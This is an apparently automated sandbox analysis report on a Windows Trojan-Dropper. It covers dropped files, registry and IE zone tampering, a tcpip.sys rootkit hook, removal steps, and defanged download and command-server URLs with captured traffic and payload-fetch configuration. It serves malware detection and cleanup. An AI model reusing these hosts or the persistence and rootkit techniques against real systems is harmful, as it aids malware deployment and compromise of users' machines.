Trojan-Dropper.Win32.Flystud.d (Kaspersky), Gen:Variant.Graftor.104958 (B) (Emsisoft), Gen:Variant.Graftor.104958 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan
This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 1029a3693577a20f33abe5e8b6dae06f
SHA1: f136cccde3e38a4629a5487bb9489be5189fb22d
SHA256: 2e35362b419de4f52e1ee9ff9f863810e62ec540ea7026adc55e046c2cebbc38
SSDeep: 49152:Av4hcI6DRlQRAt8Rxhwp3ijLsTQpsvD/DX y4onCYDoD5:2I79wp4yOsvD/D donCYUV
Size: 2070410 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: TODO:
Created at: 2000-05-19 13:11:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. A Trojan program intended for the stealthy installation of other malware on the user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424
The Trojan injects its code into the following process(es):
300084.exe:256
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
The process bv.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\byteFirewall.dat (253 bytes)
The process 7048ico.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)
The process comdhost.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (0 bytes)
Registry activity
The process %original file name%.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 0E B0 DC C8 12 71 5E 22 5F DE A4 C4 DB 6E 18"
The process bv.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7A E7 B2 35 A7 1B F5 B9 E2 38 71 F4 CE 77 8E"
The process 7048ico.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 FC 3D 27 FF 85 4F 32 EA 27 29 91 3B 95 74 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\2015040604]
"svchost.exe" = "2015"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process comdhost.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 34 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CF 63 BA 05 25 F3 2A A9 71 B2 1B 40 3E 92 F7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
97c8fe752e354b2945e4c593a87e4a8b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\krnln.fnr |
d63851f89c7ad4615565ca300e8b8e27 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\shell.fne |
11696f334778bda9231aa6b72bbcdaf7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_N4\krnln.fnr |
bfa0b913e4067706b8f2746d51caac44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bv.exe |
3ed32c6b3a6794a7ee6223aef4670b5d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\smss.exe |
cf0611524894bb6d0a64a8e157846efd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe |
4de3914c7921c9d382d5d73ffc5f55cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\msvcr32.dll |
1ddf4cc1188804e8670e9ca6139c2fed | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\szicoad[1].exe |
103909a23b5ac9774471b315d373fc06 | c:\WINDOWS\2015040604\TCP-2015040604.dll |
1ddf4cc1188804e8670e9ca6139c2fed | c:\WINDOWS\2015040604\svchost.exe |
14e87fff8fa466a7b829c65cc12fb35f | c:\WINDOWS\system\7048ico.exe |
33579f370aeb1237a9282b51eacb6d34 | c:\WINDOWS\system\svchost.exe |
fa682e642f66964cfddaa86b938d6694 | c:\byteFirewall.dat |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\??\C:\byteFirewall.dat", the Trojan replaces the IRP handlers of the tcpip.sys driver's device objects in order to control them:
MJ_CREATE
MJ_CREATE_NAMED_PIPE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_QUERY_INFORMATION
MJ_SET_INFORMATION
MJ_QUERY_EA
MJ_SET_EA
MJ_FLUSH_BUFFERS
MJ_QUERY_VOLUME_INFORMATION
MJ_SET_VOLUME_INFORMATION
MJ_DIRECTORY_CONTROL
MJ_FILE_SYSTEM_CONTROL
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
MJ_SHUTDOWN
MJ_LOCK_CONTROL
MJ_CLEANUP
MJ_CREATE_MAILSLOT
MJ_QUERY_SECURITY
MJ_SET_SECURITY
MJ_POWER
MJ_SYSTEM_CONTROL
MJ_DEVICE_CHANGE
MJ_QUERY_QUOTA
MJ_SET_QUOTA
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
C:\byteFirewall.dat (253 bytes)
%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 19868 | 20480 | 4.51528 | 15c1f09b5a84212473d3312136f61984 |
.rdata | 24576 | 2634 | 4096 | 2.46987 | c3a429c9401d144a06bbf6c66f26e739 |
.data | 28672 | 8024 | 8192 | 1.98312 | 391dfe9979de8fe0fe40df3f14303242 |
.ecode | 36864 | 4096 | 4096 | 3.11561 | dd0555631ceaf30c86b63ebb73afd81f |
.rsrc | 40960 | 928 | 4096 | 1.08643 | 654c64e0942f056dece224a875c0f5c8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ipaddress.wb916.com/IP.aspx | 180.97.81.86 |
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://oss-cn-beijing-sandbox-2.ossuser.aliyuncs.com/server/server.txt | |
hxxp://cdct.zhdns.net/proj/BackEnd.ini | |
hxxp://cdct.zhdns.net/m137390001.xml | |
hxxp://ddkj04.oss-cn-hangzhou.aliyuncs.com/updata/adclient/client/szicoad.exe | |
hxxp://cdct.zhdns.net/proj/BackEnd32.zip | |
hxxp://cdct.zhdns.net/config.xml | |
hxxp://cdct.zhdns.net/proj/MainCtrl.xml | |
hxxp://pubyun.s.3322.net/dyndns/getip | |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 87.245.221.113 |
hxxp://domain.awangba.com.cn/proj/MainCtrl.xml | 58.218.211.249 |
hxxp://domain.awangba.com.cn/proj/BackEnd.ini | 58.218.211.249 |
hxxp://down04.kuaibu8.com/updata/adclient/client/szicoad.exe | 112.124.219.90 |
hxxp://www.3322.org/dyndns/getip | 118.184.176.15 |
hxxp://down.awangba.com.cn/proj/BackEnd32.zip | 122.226.181.115 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 87.245.221.113 |
hxxp://user.awangba.com.cn/m137390001.xml | 122.226.102.76 |
hxxp://domain.awangba.com.cn/config.xml | 58.218.211.249 |
hxxp://gengxin.kuaibu8.com/server/server.txt | 182.92.18.11 |
tongji.wangbax.cn | 115.28.38.37 |
www.kuaibu8.com | 180.97.81.86 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10437
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
1401D04D49E16F8687....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:36:45 GMT
Accept-Ranges: bytes
ETag: "804c50f7c94fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49859
Cache-Control: max-age=10786
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
MSCF............,...................I.......#.........WFw. .authroot.stl.....08..CK...<.......m..dK.......D.d'....fW...RJe.).."...n.Ie.,E.RH...L....\...z.^...p.<g.9...~...=.d/.. ...H....8f|&x.N.d..p(....(....g.@ga0..4...E(.p`d. .....D.....g%.j..w.DF..GW .....*.@6....#.8....v..=T..^.G.G.!.A........_...r..3n...G.g\_.r.....Au..sw.3.....G.f. ..0..0.^.R".K|.....y...l..1.......t.(...0Y......4.,......x..ENY.`d..O.....!..9A~....^...H.2.-.jK.r.....m.q.....5.@.r...@....A.B.....e...x.).|.H...A.[.Q. D`.}YQvx.B`b.=....,X...-.5S..N..=x.....C.Mj^.H....5b...5........I...`..... ..l.n.:.....j...u2gA.hx.`%K.bw...\!o.........R....=..*...w..J....q.?^.PuA..W...>.._..O......9|.../......m.E.u.d...J2.U.e?....}h.S.zC^...<.c)...^c.b}.2..'X567.!.h. ......5.......S*.z%..%..e...R...C#p..k.[...3...jI.<.Z.GX.u.- ....ut{.&>...:.......f...f.)y.....5.../R.b.......r.!.4.-a.....!...P......Q'7.0.%[.~m_..v....;..:.X..~...,.......O....u|T.L....w....)5.bBs..W..r..u.......W......'G......y...h.. %. z?..............f.Nx./c...R...`..y.>....'......l=.O..#......... ..P..Q.......3.............M......%...v.:(...u..zU......G_.<ue...F.....6Xo......P.......@L#........4<....K.g:...3o.N..:..zb...5..,.5...C... .4..`Q0.....$9./.$1....WL)$.0F......^..k..D.*.#.L3. (}.,,.kd.<W.....[,.....Y.n.b.....4.Y)...c.g..`.y.........X..I? '.{Cb.GDh.d..F..2B...sT.^..!.L..}.P....C...?.......~.....d....5.j...1.y9^_K..g..pX.......^z.e)....yc......?..o...e......KJ..H.O..m......B27....?.~m ..xt...c...@b..S.......a(....f1...h.0.u4..(.........2b`....]..H.Ja..
<<< skipped >>>
GET /config.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 617
Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 08:32:08 GMT
ETag: "54bf5c75-269"
Age: 62667
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<Config>.. <UpUrl>.. <MainPageID></MainPageID>.. <ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com</ycgg>.. </UpUrl>...<BlackUrl>about:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com@111.113.6.21@*.yxeram.org@*.yxera.org@*.yxera.net@192.168.*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>...<OutGameUrl>hXXp://tz.awangba.com.cn/uimg1.htm@hXXp://VVV.baidu.com@hXXp://VVV.sina.com@hXXp://VVV.163.com</OutGameUrl>...<TestUser>*</TestUser>...<MainPageWhite></MainPageWhite>..</Config>..HTTP/1.0 200 OK..Content-Type: text/xml; charset=utf-8..Content-Length: 617..Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT..Accept-Ranges: bytes..Server: nginx..Date: Sun, 05 Apr 2015 08:32:08 GMT..ETag: "54bf5c75-269"..Age: 62667..X-Cache: HIT from ctjsxzs1..Via: 1.0 ctjsxzs1 (squid)..Connection: keep-alive..<?xml version="1.0" encoding="UTF-8"?>..<Config>.. <UpUrl>.. <MainPageID></MainPageID>.. <ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com</ycgg>.. </UpUrl>...<BlackUrl>about:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com@111.113.6.21@*.yxeram.org@*.yxera.org@*.yxera.net@192.168.*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>...<OutGameUrl>htt
<<< skipped >>>
GET /proj/MainCtrl.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 4337
Last-Modified: Fri, 03 Apr 2015 03:12:39 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 05:05:29 GMT
ETag: "551e0527-10f1"
Age: 75067
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<FileDown>...<item name="common" type="Common">....<sys type="all">.....<file>common.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/common.zip</down>.....<md5>116C3295FF8726952963A5774637B309</md5>.....<param>appboot.exe</param>....</sys>...</item>......<item name="new" type="SGTS">....<sys type="x86">.....<file>sgts.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/sgts.zip</down>.....<md5>FC538737F7D79ACB274CE860194614A3</md5>.....<param>sgts.exe</param>....</sys>...</item>...<item name="gda" type="GDA">....<sys type="x86">.....<file>PtsGPU32.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/PtsGPU32.zip</down>.....<md5>6556006F549C0AE154AE60694D5242E2</md5>.....<param>PtsGPU.exe</param>....</sys>....<sys type="x64">.....<file>PtsGPU64.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/PtsGPU64.zip</down>.....<md5>AA9328656593D9D174CC5BDF07687807</md5>.....<param>PtsGPU.exe</param>....</sys>...</item>.. ...<item 